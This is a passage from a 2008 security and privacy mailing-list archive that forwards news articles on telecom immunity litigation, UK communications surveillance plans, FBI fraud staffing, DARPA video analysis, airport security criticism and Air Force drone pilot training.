She said the new law does not require any Internet provider to monitor traffic. "They have the responsibility and their right to manage the network as they wish," Dunn said. "If AOL wants to monitor their network for child porn, some customers may go to them, because they'll keep them from getting this stuff showing up in their e-mail. Other companies may choose not to, and other people may prefer that. We're not dictating to them that they monitor their network."

Brilliant Digital Entertainment is betting that most internet companies will choose to monitor their customers. Michael Speck said his company's product pitches have been well received by law enforcement agencies, government officials and Internet service providers. "I don't think there's anyone in the Internet space," Speck said, "who doesn't think fighting child sexual exploitation is good business."

© 2008 msnbc.com
URL: http://www.msnbc.msn.com/id/27198621/

From rforno at infowarrior.org Fri Oct 17 11:35:36 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 17 Oct 2008 07:35:36 -0400
Subject: [Infowarrior] - EFF Challenging Telcom Immunity
Message-ID: <54ABB33C-4863-4813-BD20-C90C12F69D65@infowarrior.org>

http://www.eff.org/press/archives/2008/10/17

October 17th, 2008

EFF Challenges Constitutionality of Telecom Immunity in Federal Court
Unconstitutional Law Cannot Shut Courthouse Door on Americans' Privacy Claims

San Francisco - The Electronic Frontier Foundation (EFF) Thursday challenged the constitutionality of a law aimed at granting retroactive immunity to telecommunications companies that participated in the president's illegal domestic wiretapping program. In a brief filed in the U.S. District Court in San Francisco, EFF argues that the flawed FISA Amendments Act (FAA) violates the federal government's separation of powers as established in the Constitution and robs innocent telecom customers of their rights without due process of law.
Signed into law earlier this year, the FAA allows for the dismissal of the lawsuits over the telecoms' participation in the warrantless surveillance program if the government secretly certifies to the court that either the surveillance did not occur, was legal, or was authorized by the president. Attorney General Michael Mukasey filed that classified certification with the court last month. "The immunity law puts the fox in charge of the hen house, letting the Attorney General decide whether or not telecoms like AT&T can be sued for participating in the government's illegal warrantless surveillance," said EFF Senior Staff Attorney Kevin Bankston. "In our constitutional system, it is the judiciary's role as a co-equal branch of government to determine the scope of the surveillance and rule on whether it is legal, not the executive's. The Attorney General should not be allowed to unconstitutionally play judge and jury in these cases, which affect the privacy of millions of Americans." In the public version of his certification to the court, Attorney General Mukasey asserted that the government had no "content-dragnet" program that searched for keywords in the body of communications. However, the government did not deny the dragnet acquisition of the content of communications. In support of its opposition, EFF provided the court with a summary of thousands of pages of documents demonstrating the broad dragnet surveillance of millions of innocent Americans' communications. Eight volumes of exhibits accompanied the detailed summary, including eyewitness accounts and testimony under oath. "We have overwhelming record evidence that the domestic spying program is operating far outside the bounds of the law," said EFF Senior Staff Attorney Kurt Opsahl. "Intelligence agencies, telecoms, and the Administration want to sweep this case under the rug, but the Constitution won't permit it." EFF is representing the plaintiffs in Hepting v. 
AT&T, a class action lawsuit brought on behalf of millions of AT&T customers whose private domestic communications and communications records were illegally handed over to the National Security Agency (NSA). EFF has been appointed co-coordinating counsel along with the American Civil Liberties Union (ACLU) for all 47 of the outstanding lawsuits concerning the government's warrantless surveillance program. The constitutional challenge is set to be heard on December 2.

For the full brief:
http://www.eff.org/files/filenode/att/opposition101608.pdf

For the summary of evidence:
http://www.eff.org/files/filenode/att/section1006summary101608_0.pdf

For more on the NSA spying:
http://www.eff.org/issues/nsa-spying

Contacts:

Kevin Bankston
Senior Staff Attorney
Electronic Frontier Foundation
bankston at eff.org

Kurt Opsahl
Senior Staff Attorney
Electronic Frontier Foundation
kurt at eff.org

From rforno at infowarrior.org Sat Oct 18 02:14:43 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 17 Oct 2008 22:14:43 -0400
Subject: [Infowarrior] - UK gov outlines national comms surveillance plan
Message-ID:

Government gives more detail on communications surveillance plan
OUT-LAW News, 16/10/2008
http://www.out-law.com//default.aspx?page=9515

The Government has postponed planned legislation which could create a giant central database containing records of every email, web session and phone call made in the UK.

The Government said before summer that it would create new communications legislation that would make the recording of the fact of communications, though not their content, compulsory. It has emerged that that law had been planned for the end of this year but will now be postponed until next year following consultation.

Government sources have told reporters that one option is to create a single, Government-operated database of call and web use records but that there would be a public consultation on measures before the law is passed.
The Government has announced that any law would extend the powers of communications logging so that they could track the use of communications through websites such as social networking sites.

Law enforcement agencies can currently gain access to records kept by telecoms providers about which number or computer contacted which other number or computer, for how long and when as well as any location data that the operator has. Providers are compensated by the state for the costs of providing such information.

One current Home Office proposal, sources have told reporters, is that a single public database would track and provide that information.

Home Secretary Jacqui Smith told think-tank the Institute for Public Policy Research yesterday that the Government would act on communications surveillance and would extend the reach into new forms of communication.

"Our ability to intercept communications and obtain communications data is vital to fighting terrorism and combating serious crime, including child sex abuse, murder and drugs trafficking," said Smith. "Communications Data -- that is, data about calls, such as the location and identity of the caller, not the content of the calls themselves -- is used as important evidence in 95% of serious crime cases and in almost all Security Service operations since 2004."

"But the communications revolution has been rapid in this country and the way in which we intercept communications and collect communications data needs to change too. If it does not we will lose this vital capability that we currently have and that we all take for granted," she said.

Authorities' use of information on phone calls and web use is possible because companies track usage data for billing purposes. That is not true of alternative messaging systems such as internet-based phone technology or social networking messaging and the Government is said to be keen to track such use.
The changes will be part of the Data Communications Bill, which will also transpose into UK law the EU's Data Retention Directive. This asks member states to make it a legal requirement that communications records are kept for between six and 24 months, though it does not require that the information be kept on a Government database.

Privacy watchdog the Information Commissioner's Office (ICO) said earlier this year that it opposed the creation of a new single database containing communications records. "If the intention is to bring all mobile and internet records together under one system, this would give us serious concerns and may well be a step too far," said Jonathan Bamford, assistant Information Commissioner. "We are not aware of any justification for the state to hold every UK citizen's phone and internet records."

Smith said that a consultation on the new law would take place in the New Year.

From rforno at infowarrior.org Sun Oct 19 01:56:13 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Sat, 18 Oct 2008 21:56:13 -0400
Subject: [Infowarrior] - The Atlantic Magazine article on TSA Follies
Message-ID: <01C396F7-CD5D-48D9-A1B9-CA32712DC885@infowarrior.org>

November 2008

Airport security in America is a sham -- "security theater" designed to make travelers feel better and catch stupid terrorists. Smart ones can get through security with fake boarding passes and all manner of prohibited items -- as our correspondent did with ease.
< - >

http://www.theatlantic.com/doc/200811/airport-security

From rforno at infowarrior.org Sun Oct 19 02:01:16 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Sat, 18 Oct 2008 22:01:16 -0400
Subject: [Infowarrior] - Vatican joins INTERPOL
Message-ID:

Vatican a member of Interpol after unanimous vote
Richard Owen in Rome
http://www.timesonline.co.uk/tol/comment/faith/article4901449.ece

It may be one of the world's smallest states and have one of the world's smallest police forces, but the Vatican was today admitted "by unanimous vote" as Interpol's 187th member at the organisation's General Assembly, held in St Petersburg.

Interpol's acting President, Arturo Herrera Verdugo, handed an Interpol flag to the secretary-general of the governorate of Vatican City, Bishop Renato Boccardo. Monsignor Boccardo said the Holy See was joining Interpol because it "shared its views on dealing with global challenges".

The Vatican set up new anti-terrorism units earlier this year. Although the Vatican plays down terrorist threats it has stepped up security, with visitors to St Peter's Basilica required to pass through metal detectors.

Its 160-strong security force, the Vatican corps of gendarmes, is staffed entirely by Italians. The gendarme corps is distinct from the Swiss Guard, the Pope's personal protection force, but works closely with it.

Domenico Giani, the corps commander, said the Holy See was also considering a new "agreement of cooperation with Italian police," due to the "upsurge in criminal activity".

The duties of the Vatican gendarme corps include border control, crime prevention and investigation, and the enforcement of financial regulations. It was founded in 1816 by Pope Pius VII.

From rforno at infowarrior.org Sun Oct 19 13:46:50 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Sun, 19 Oct 2008 09:46:50 -0400
Subject: [Infowarrior] - F.B.I.
Struggles to Handle Wave of Financial Fraud Cases
Message-ID: <755D76D2-FD49-4436-90FD-9C4D3EB53776@infowarrior.org>

October 19, 2008

F.B.I. Struggles to Handle Wave of Financial Fraud Cases
By ERIC LICHTBLAU, DAVID JOHNSTON and RON NIXON
http://www.nytimes.com/2008/10/19/washington/19fbi.html?_r=2&hp=&oref=slogin&pagewanted=print&oref=slogin

WASHINGTON -- The Federal Bureau of Investigation is struggling to find enough agents and resources to investigate criminal wrongdoing tied to the country's economic crisis, according to current and former bureau officials.

The bureau slashed its criminal investigative work force to expand its national security role after the Sept. 11 attacks, shifting more than 1,800 agents, or nearly one-third of all agents in criminal programs, to terrorism and intelligence duties. Current and former officials say the cutbacks have left the bureau seriously exposed in investigating areas like white-collar crime, which has taken on urgent importance in recent weeks because of the nation's economic woes.

The pressure on the F.B.I. has recently increased with the disclosure of criminal investigations into some of the largest players in the financial collapse, including Fannie Mae and Freddie Mac. The F.B.I. is planning to double the number of agents working financial crimes by reassigning several hundred agents amid a mood of national alarm. But some people inside and out of the Justice Department wonder where the agents will come from and whether they will be enough.

So depleted are the ranks of the F.B.I.'s white-collar investigators that executives in the private sector say they have had difficulty attracting the bureau's attention in cases involving possible frauds of millions of dollars.

Since 2004, F.B.I.
officials have warned that mortgage fraud posed a looming threat, and the bureau has repeatedly asked the Bush administration for more money to replenish the ranks of agents handling nonterrorism investigations, according to records and interviews. But each year, the requests have been denied, with no new agents approved for financial crimes, as policy makers focused on counterterrorism.

According to previously undisclosed internal F.B.I. data, the cutbacks have been particularly severe in staffing for investigations into white-collar crimes like mortgage fraud, with a loss of 625 agents, or 36 percent of its 2001 levels.

Over all, the number of criminal cases that the F.B.I. has brought to federal prosecutors -- including a wide range of crimes like drug trafficking and violent crime -- dropped 26 percent in the last seven years, going from 11,029 cases to 8,187, Justice Department data showed.

"Clearly, we have felt the effects of moving resources from criminal investigations to national security," said John Miller, an assistant director at the F.B.I. "In white-collar crime, while we initiated fewer cases over all, we targeted the areas where we could have the biggest impact. We focused on multimillion-dollar corporate fraud, where we could make arrests but also recover money for the fraud victims."

But Justice Department data, which include cases from other agencies, like the Secret Service and Postal Service, illustrate the impact. Prosecutions of frauds against financial institutions dropped 48 percent from 2000 to 2007, insurance fraud cases plummeted 75 percent, and securities fraud cases dropped 17 percent.

Statistics from a research group at Syracuse University, the Transactional Records Access Clearinghouse, using somewhat different methodology and looking only at the F.B.I., show an even steeper decline of nearly 50 percent in overall white-collar crime prosecutions in the same period.
In addition to the investigations into Fannie Mae and Freddie Mac, the F.B.I. is carrying out investigations of American International Group and Lehman Brothers, and it has opened more than 1,500 other mortgage-related investigations. Some F.B.I. officials worry privately that the trillion-dollar federal bailout of the financial industry may itself become a problem because it contains inadequate controls to deter fraud.

No one has suggested that a quicker response would have averted the mortgage meltdown, but some officials said a faster reaction might have deterred more of the early schemes that seized on loose federal lending regulations.

"They were very late to the game," Representative Zoe Lofgren, a California Democrat who has quarreled with the F.B.I. over its financing priorities, said of the bureau's response to the mortgage crisis. "They were not on top of this, and they're just now starting to really do something."

Republicans and Democrats in Congress are pushing for a more aggressive response by the F.B.I. Representatives Mark S. Kirk, an Illinois Republican who sits on the House appropriations committee, and Chris P. Carney, a Pennsylvania Democrat, called on Congress to triple the F.B.I.'s financing for financial crimes investigations.

"To fix our system and prevent a repeat of the events we now see," they wrote in a letter this month to Robert S. Mueller III, the F.B.I. director, "we have got to set an example by bringing the full might of federal law enforcement against the people who illegally profited or destroyed companies at the expense of our country."

In public, Mr. Mueller has said that the bureau is doing more with less, when it comes to criminal prosecutions. And Justice Department officials have repeatedly asserted the administration's commitment to fight violent and white-collar crime even as they have not provided the bureau additional resources.

But current and former officials say Mr.
Mueller has lost a behind-the-scenes battle with the Justice Department and the Office of Management and Budget to replenish the criminal ranks. Interviews and internal records show that F.B.I. officials realized the growing danger posed by financial fraud in the housing market beginning in 2003 and 2004 but were rebuffed by the Justice Department and the budget office in their efforts to acquire more resources.

"The administration's top priority since the 9/11 attacks has been counterterrorism," Peter Carr, a Justice Department spokesman, said. "In part, that's reflected by a significant investment of resources at the F.B.I. to answer the call from Congress and the American public to become a domestic intelligence agency in addition to a law enforcement agency."

From 2001 to 2007, the F.B.I. sought an increase of more than 1,100 agents for criminal investigations apart from national security. Instead, it suffered a decrease of 132 agents, according to internal F.B.I. figures obtained by The New York Times. During these years, the bureau asked for an increase of $800 million, but received only $50 million more. In the 2007 budget cycle, the F.B.I. obtained money for a total of one new agent for criminal investigations.

In 2004, one senior F.B.I. official, Chris Swecker, warned publicly that a flood of fraudulent mortgage deals had the potential to become "an epidemic." Yet the next year, as public warnings about fraud in the subprime lending markets began to approach their height, the F.B.I. had the equivalent of only 15 full-time agents devoted to mortgage fraud out of a total of some 13,000 agents in the bureau.

That number has grown to 177 agents, who have opened 1,522 cases. But the staffing level is still hundreds of agents below the levels seen in the 1980s during the savings and loan crisis.

F.B.I.
officials said they had had no choice but to make the cuts in the criminal division, which they said were necessary to expand the bureau's national security effort, particularly in the wake of criticism of the bureau's performance in failing to detect the Sept. 11 plot.

In white-collar crime, they said the bureau has given up only lower-level cases of marginal significance that might have never been prosecuted anyway. They say they have focused the available criminal resources on public corruption and other difficult crime issues in which the F.B.I. can make a unique contribution.

"We only had a finite number of white-collar crime agents available to address the threat that mortgage fraud posed," said Joseph Ford, who retired from the F.B.I. this year and once served as its chief financial officer.

The Justice Department is relying more than ever on the state and local authorities to pick up the slack through joint task forces. And private investigators say that companies victimized by fraud are turning to them in increasing numbers because they are unable to attract much attention from the F.B.I. anymore.

In some instances, private investigative and accounting firms are now collecting evidence, taking witness statements and even testifying before grand juries, in effect preparing courtroom-ready prosecutions they can take to the F.B.I. or local authorities.

"Anytime you bring to the F.B.I. a case that is thoroughly investigated and reduce the amount of work for investigators, the likelihood is that they will take the case and present it for prosecution," said Alton Sizemore, a former F.B.I. agent who is a fraud examiner for Forensic Strategic Solutions in Birmingham, Ala.

One American company facing extortion demands last year from a computer hacker used private investigators from the Kroll firm to do much of the legwork in the case as the F.B.I. monitored and directed the situation behind the scenes, said Daniel Karson, executive managing director for Kroll.
The private investigators even went undercover and set up a sting operation that led them to Germany, where the authorities made an arrest. Mr. Karson said the F.B.I. no longer had the resources to take on such lower-level cases by itself.

"When you come in with a garden variety, plain vanilla crime, you may have to stand in the queue," he said.

Some critics question whether the shift indicates not just a lack of resources, but a lack of interest by the Bush administration.

After the collapse of Enron in 2002, the Justice Department moved aggressively against corporate fraud -- too aggressively, in the view of some people within the administration. It set up a national task force to tackle the problem, garnered hundreds of convictions at companies like WorldCom, Adelphia and Enron, and forced the closure of Arthur Andersen, the accounting firm, for its role in the Enron collapse.

But several former law enforcement officials said in interviews that senior administration officials, particularly at the White House and the Treasury Department, had made clear to them that they were concerned the Justice Department and the F.B.I. were taking an antibusiness attitude that could chill corporate risk taking.

Justice Department officials said political pressures had never influenced the way prosecutors approached corporate cases. But the department's approach has become noticeably more tempered in the last several years.

This spring and summer, as public concerns about the subprime mortgage crisis were growing, Attorney General Michael B. Mukasey rejected repeated calls for the creation of a national task force like the one used after the Enron collapse. The attorney general likened the problem to "white-collar street-crime" that could best be handled by individual United States attorneys' offices.

In the last four years, the Justice Department has scored fewer of the big-name prosecutions that marked President Bush's first term in office.
Even when investigations have pointed to corporate wrongdoing, the Justice Department has agreed, in dozens of cases in the last four years, to "deferred prosecutions" that allowed companies to pay fines in order to avoid criminal prosecution.

Paul J. McNulty, who served as deputy attorney general under Alberto R. Gonzales, said the complexity of white-collar investigations and the shortage of investigators had driven a decline in high-profile cases.

"There's no question that the department has been stretched thin when it comes to resources generally, and that has affected white-collar enforcement in a variety of areas," Mr. McNulty said in an interview.

"What happened is that the first years after the Enron collapse, there were some very high profile, noticeable cases -- the low-hanging fruit -- that gave Justice the opportunity to rack up some very big wins," he said. "Those cases played themselves out and it became tougher to find those big cases."

From rforno at infowarrior.org Sun Oct 19 23:49:45 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Sun, 19 Oct 2008 19:49:45 -0400
Subject: [Infowarrior] - FUD Alert: Spies Worry Hackers Could Fuel Financial Panic
Message-ID: <9BFA8691-92DD-4DDB-83F0-B7DDB31AE63E@infowarrior.org>

Spies Worry Hackers Could Fuel Financial Panic
By Noah Shachtman
October 17, 2008 | 12:00:00 PM
Categories: Info War
http://blog.wired.com/defense/2008/10/spies-worry-hac.html

We all laughed and pointed our fingers at Chuck Norris, when he floated the idea earlier this week that the current crisis on Wall Street is the result of "economic terrorism." Some of the nation's counterintelligence officials aren't smiling, however. No, they don't believe Chuck's thesis about some mysterious "manipulation of the marketplace" that's causing us all to lose our life savings.
But some spooks are concerned that hackers could send already-frazzled "stock markets into one more panicked frenzy, by covertly manipulating data and spreading false information," Shane Harris reports in the latest edition of National Journal. As evidence, spooks point to the recent hits to Apple's and United Airlines' stock prices, based on misinformation. And they cite the example of Jerome Kerviel, a hacker and trader at the French financial firm Societe Generale. In January, Kerviel caused a worldwide financial panic, basically by himself. First, he made all kinds of bogus, risky trades. Then Kerviel hacked his employer's networks, to cover up his tracks. He "disabled an automatic-alert mechanism that should have flagged his reckless transactions. And he stole passwords that gave him access to accounting records, which he falsified to cover his tracks. He even constructed fake e-mails about fictitious trades to make his activities seem real." The bank's losses "totaled more than $7 billion." But, more importantly, it started a stampede in the futures market, and a dip in the world's stock markets. It got so bad that Federal Reserve Board Chairman Ben Bernanke had to make an emergency cut of the interest rate that the Fed charges banks for overnight loans. Last month, hackers in another case were sentenced to two years in prison for rigging stock prices. Is the intel officers' worry -- that a Kerviel-on-steroids could trigger an even wider panic -- legit? Well, these spooks are professional worrywarts. They're paid to come up with nightmare scenarios -- and think of ways to counter it. Hell, some of 'em are even biting their nails about terrorists in World of Warcraft. But this seems a little more legit. Even if it does sound vaguely reminiscent of a Chuck Norris freak-out. 
http://blog.wired.com/defense/2008/10/spies-worry-hac.html

From rforno at infowarrior.org Mon Oct 20 01:02:23 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Sun, 19 Oct 2008 21:02:23 -0400
Subject: [Infowarrior] - UK: Passport required to buy cellphone
Message-ID: <627EC0B3-4BAD-4EFA-8AC6-FB7BE0DA2138@infowarrior.org>

(Another stupid security kabuki theater item - they assume that 'terrorists' will ONLY use a cellphone. --rf)

Passports will be needed to buy mobile phones
David Leppard
http://www.timesonline.co.uk/tol/news/politics/article4969312.ece

Everyone who buys a mobile telephone will be forced to register their identity on a national database under government plans to extend massively the powers of state surveillance.

Phone buyers would have to present a passport or other official form of identification at the point of purchase. Privacy campaigners fear it marks the latest government move to create a surveillance society.

A compulsory national register for the owners of all 72m mobile phones in Britain would be part of a much bigger database to combat terrorism and crime. Whitehall officials have raised the idea of a register containing the names and addresses of everyone who buys a phone in recent talks with Vodafone and other telephone companies, insiders say.

The move is targeted at monitoring the owners of Britain's estimated 40m prepaid mobile phones. They can be purchased with cash by customers who do not wish to give their names, addresses or credit card details.

The pay-as-you-go phones are popular with criminals and terrorists because their anonymity shields their activities from the authorities. But they are also used by thousands of law-abiding citizens who wish to communicate in private.
The move aims to close a loophole in plans being drawn up by GCHQ, the government's eavesdropping centre in Cheltenham, to create a huge database to monitor and store the internet browsing habits, e-mail and telephone records of everyone in Britain.

The "Big Brother" database would have limited value to police and MI5 if it did not store details of the ownership of more than half the mobile phones in the country.

Contingency planning for such a move is already thought to be under way at Vodafone, where 72% of its 18.5m UK customers use pay-as-you-go.

The office of Richard Thomas, the information commissioner, said it anticipated that a compulsory mobile phone register would be unveiled as part of a law which ministers would announce next year.

"With regards to the database that would contain details of all mobile users, including pay-as-you-go, we would expect that this information would be included in the database proposed in the draft Communications Data Bill," a spokeswoman said.

Simon Davies, of Privacy International, said he understood that several mobile phone firms had discussed the proposed database in talks with government officials.

As The Sunday Times revealed earlier this month, GCHQ has already been provided with up to £1 billion to work on the pilot stage of the Big Brother database, which will see thousands of "black boxes" installed on communications lines provided by Vodafone and BT as part of a pilot interception programme.

The proposals have sparked a fierce backlash inside Whitehall. Senior officials in the Home Office have privately warned that the database scheme is impractical, disproportionate and potentially unlawful. The revolt last week forced Jacqui Smith, the home secretary, to delay announcing plans for the database until next year.
From rforno at infowarrior.org Mon Oct 20 02:35:45 2008
From: rforno at infowarrior.org (Richard Forno)
Date: Sun, 19 Oct 2008 22:35:45 -0400
Subject: [Infowarrior] - DARPA Contract Hints at Advanced Video Spying
Message-ID: <475252EC-138F-4A72-94C6-40B4D744F02A@infowarrior.org>

DARPA Contract Description Hints at Advanced Video Spying
By Walter Pincus
Monday, October 20, 2008; A13
http://www.washingtonpost.com/wp-dyn/content/article/2008/10/19/AR2008101901572_pf.html

Real-time streaming video of Iraqi and Afghan battle areas taken from thousands of feet in the air can follow actions of people on the ground as they dig, shake hands, exchange objects and kiss each other goodbye.

The video is sent from unmanned and manned aircraft to intelligence analysts at ground stations in the United States and abroad. They watch video in real time of people getting in and out of cars, loading trunks, dropping things or picking them up. They can even see vehicles accelerate, slow down, move together or make U-turns.

"The dynamics of an urban insurgency have resulted in a rapid increase in the number of activities visible in the video field of view," according to the Defense Advanced Research Projects Agency.

Although the exploits of the Predator, the Global Hawk and other airborne collectors of information have been widely publicized, there are few authoritative descriptions of what they can see on the ground. But some insights into the capabilities of the Predator and other aircraft can be drawn from a DARPA paper that describes the tasks of a contractor that will develop a method of indexing and rapidly finding video from archived aerial surveillance tapes collected over past years.

"The U.S.
military and intelligence communities have an ever increasing need to monitor live video feeds and search large volumes of archived video data for activities of interest due to the rapid growth in development and fielding of motion video systems," according to the DARPA paper, which was written in March but released last month. Last month, Kitware, a small software company with offices in New York and North Carolina, teamed up with 19 other companies and universities and won the $6.7 million first phase of the DARPA contract, which is not expected to be completed before 2011. During the Cold War, satellites and aircraft took still pictures that intelligence analysts reviewed one frame at a time to identify the locations of missile silos, airplane hangars, submarine pens and factories, said John Pike, director of GlobalSecurity.org, an expert in space and intelligence matters. "Now with new full-motion video intelligence techniques, we are looking at people and their behavior in public," he said. The resolution capability of the video systems ranges from four inches to a foot, depending on the collector and environmental conditions at the time, according to the DARPA paper. The video itself is also shaped by the angle to the ground from which it is shot, although there are 3-D capabilities that allow viewers on the ground to manipulate videos of objects so they can see them from different vantage points. Systems also exist that allow tracking, moving-target detection of objects under forest or other cover and determination of exact geographic location. Development is underway of systems that allow recognition of faces and gait -- in other words, human identification. Currently, because there are so many activities or objects to be watched for hints of suspicious behavior, "more analysts . . . watch the same, real-time video stream simultaneously," according to DARPA. 
"If any of the given activities or objects are spotted, the analyst issues an alert to the proper authorities." Future collection systems are expected to provide even more imagery, cover areas greater than 16 square miles and make it more difficult "for a limited number of analysts to effectively monitor and scrutinize all potential activities within the streaming field of view," DARPA wrote. Today's volume of intelligence data, beyond just streaming video, already "makes it very difficult to detect specific events in real time and too time intensive to search archived video," the DARPA paper said. The effort underway is designed to find a way to index similar activity, then search and retrieve it from archives. The proposed new system should be able to analyze real-time streaming video as it is received in a ground station and match it on command to archived video from more than one video library. One notion, described by DARPA, would be that an analyst with a standing alert to watch for U-turning cars could employ the new system to quickly match a real-time event with archived clips of cars making such turns before an attack. National security and intelligence reporter Walter Pincus pores over the speeches, reports, transcripts and other documents that flood Washington and every week uncovers the fine print that rarely makes headlines -- but should. If you have any items that fit the bill, please send them to fineprint at washpost.com. 
From rforno at infowarrior.org Wed Oct 22 03:32:46 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 21 Oct 2008 23:32:46 -0400 Subject: [Infowarrior] - DPP chief Sir Ken Macdonald attacks Big Brother state surveillance Message-ID: <3271113E-5112-4CF4-988C-98A080F8D69B@infowarrior.org> From Times Online October 21, 2008 DPP chief Sir Ken Macdonald attacks Big Brother state surveillance Frances Gibb, Legal Editor http://www.timesonline.co.uk/tol/news/uk/article4984788.ece The Director of Public Prosecutions has given a warning of the dangers of plans for a massive expansion of "Big Brother" state surveillance and of the growth of a "security state". Sir Ken Macdonald, who heads the Crown Prosecution Service, said that the "enormous powers of access to information" that technology had given the state should be used with great care. He told an audience in London last night: "We need to take very great care not to fall into a way of life in which freedom's back is broken by the relentless pressure of a security state." Technology, he added, was of critical importance to the struggle against serious crime and, used wisely, could protect society. It gave "the state enormous powers to access to knowledge and information about each one of us. And the ability to collect and store it at will; every second of every day, in everything we do." But Sir Ken, giving the inaugural Crown Prosecution Service lecture in London, called for "level-headedness and legislative restraint". He said: "We need to understand that it is in the nature of state power that decisions taken in the next few months and years about how the state may use these powers, and to what extent, are likely to be irreversible. "They will be with us forever," he said. "And they in turn will be built upon. "So we should take very great care to imagine the world we are creating before we build it. We might end up living with something we can't bear."
Sir Ken, who steps down at the end of this month after five years as Director of Public Prosecutions, did not refer directly to the latest Government surveillance plans. But his comments will be taken to mean the Home Secretary Jacqui Smith's plans for a new "super database" that will allow Government officials to monitor people's every online move. The Government is examining ways to collect and store records of phone calls, e-mails and internet traffic. Without the right to monitor the flow of internet messaging, the police and security services would have to consider a "massive expansion of surveillance", she said. A three-month consultation is planned for the new year. Sir Ken, who described his period as DPP as a "relentless prosecutorial struggle against terrorism", acknowledged that the country faced "very significant risks." But he said he regarded people's rights as priceless. The best way to face down security threats was to strengthen our institutions, rather than degrade them. "Our struggle has been absolutely grounded in due process," he added. "We all know that this has worked. Our conviction rates for terrorism cases is in excess of 90 per cent - unmatched in the fair trial world." He reminded his audience that when he took up his appointment, "some questioned my suitability on the grounds that I had, in my career at the Bar, defended terrorists of almost every hue." But he had made clear that his period as DPP and the "relentless struggle against terrorism" would be grounded in respect for historical norms and "for our liberal constitution". He added: "So we have been absolutely right to resist, whenever they have been suggested, special courts, vetted judges and all the other paraphernalia of paranoia." Earlier in his speech Sir Ken also gave warning about turning back the clock by giving back to the police the job of charging suspects.
There have been recent calls for a return to police charging on the ground that the role of the prosecutor in the process added to police red tape. But the CPS's role in charging, which was assumed under his period of office, made it "more likely that investigations will comply with the rules and that occasional abuses of police power will be avoided. "We make it less likely that the state will bring cases which shouldn't be brought and which are not justified by the evidence." From rforno at infowarrior.org Wed Oct 22 12:57:26 2008 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 22 Oct 2008 08:57:26 -0400 Subject: [Infowarrior] - AOL To Nuke Users' Content On Halloween Message-ID: <679D7005-AC90-42DB-A2F0-01013EB6B313@infowarrior.org> AOL To Nuke Users' Content On Halloween from the bye-bye dept http://techdirt.com/articles/20081021/0206432604.shtml theodp writes "Blaming an unquantified decline in usage, AOL has notified users it's decided the best thing to do is delete all of their blogs and files on October 31st. Want to save that precious blog of yours? AOL not-so-helpfully suggests: 'The quickest and easiest way to do this is by copying and pasting your content into a word processing document such as Microsoft Word, Notepad or even into an email and mailing it back to yourself. If you have any images we suggest you save them separately by right clicking on the image, choosing "Save Picture As" and allocate the drive on your PC where you would like to save them to.' Gee, thanks. And don't get too smug, Google users - the search giant has put its users on notice that Google Page Creator will be a thing of the past by year-end, although details of the transition have yet to be provided." These are just a few more in a long line of attempts by big companies to enable user generated content without much of a plan.
With so much attention in the space, plenty of large companies (including Yahoo and Microsoft, in addition to Google and AOL mentioned here) rushed out various tools for users, but forgot to explain to them why they might want to use them. For the most part, they just launched them and figured users would show up willingly. It turns out that, even if you're a big company, it's not so easy to get user adoption if you don't offer anything particularly special compared to what's already out there. From rforno at infowarrior.org Thu Oct 23 11:55:15 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 23 Oct 2008 07:55:15 -0400 Subject: [Infowarrior] - TSA responds to Schneier Message-ID: <8CBB203A-F784-4E90-A919-1582B62673B1@infowarrior.org> (It's always refreshing to see Bruce and others call an educated "bs" on purportedly-good security......-rf) Kip Hawley Responds to My Airport Security Antics http://www.schneier.com/blog/archives/2008/10/kip_hawley_resp.html Original Atlantic article: http://www.theatlantic.com/doc/print/200811/airport-security From rforno at infowarrior.org Thu Oct 23 17:50:23 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 23 Oct 2008 13:50:23 -0400 Subject: [Infowarrior] - USAF creates new pilot programs for drones Message-ID: <2F2AB987-9986-4DC8-990B-D66A633040F9@infowarrior.org> Air Force creates new pilot programs for drones http://news.yahoo.com/s/ap/20081023/ap_on_go_ca_st_pe/air_force_drone_pilots By LOLITA C. BALDOR, Associated Press Writer - Thu Oct 23, 7:47 am ET Photo caption: In this image provided by the U.S. Air Force, Capt. Richard Koll, left, and Airman 1st Class Mike Eulo (AP). WASHINGTON -
Scrambling to meet commanders' insatiable demands for unmanned aircraft, the Air Force is launching two new training programs, including an experimental one that would churn out up to 1,100 desperately needed pilots to fly the drones over Iraq and Afghanistan. As many as 700 Air Force personnel have expressed some interest in the test program, which will create a new brand of pilot for the drones, which are flown by remote control from a base in Nevada. That new drone operator will learn the basics of flying a small manned plane, but will not go through the longer, more rigorous training that their fighter jet brethren receive. A senior Air Force officer told The Associated Press that by the end of September 2011, the goal is to have 50 unmanned combat air patrols operating 24 hours a day, largely over Iraq and Afghanistan. Currently there are 30. To generate the pilots for the increased flights, the Air Force hopes to create separate pilot pipelines for its manned and unmanned aircraft, said Col. Curt Sheldon, assistant to the director of air operations for unmanned aircraft issues. "I don't know that you could ever get (a drone) to everybody who wants one," Sheldon said. "I believe it is virtually insatiable. We are pedaling fast, we are working hard to meet that need." Besides the new test program, Sheldon said the Air Force is planning to shift about 100 manned-aircraft pilots directly from training into jobs flying the drones. The unmanned aircraft are mostly Predators - hunter-killer planes that fly in the war zone but are operated by pilots sitting at Creech Air Force Base in Nevada. Until now, Unmanned Aerial System (UAS) pilots have had to complete at least one tour of flight duty before moving to the drone jobs. The urgent push for more drone pilots has been spurred by blunt demands from Defense Secretary Robert Gates. He has criticized the Air Force's failure to move more quickly to meet war commanders' needs.
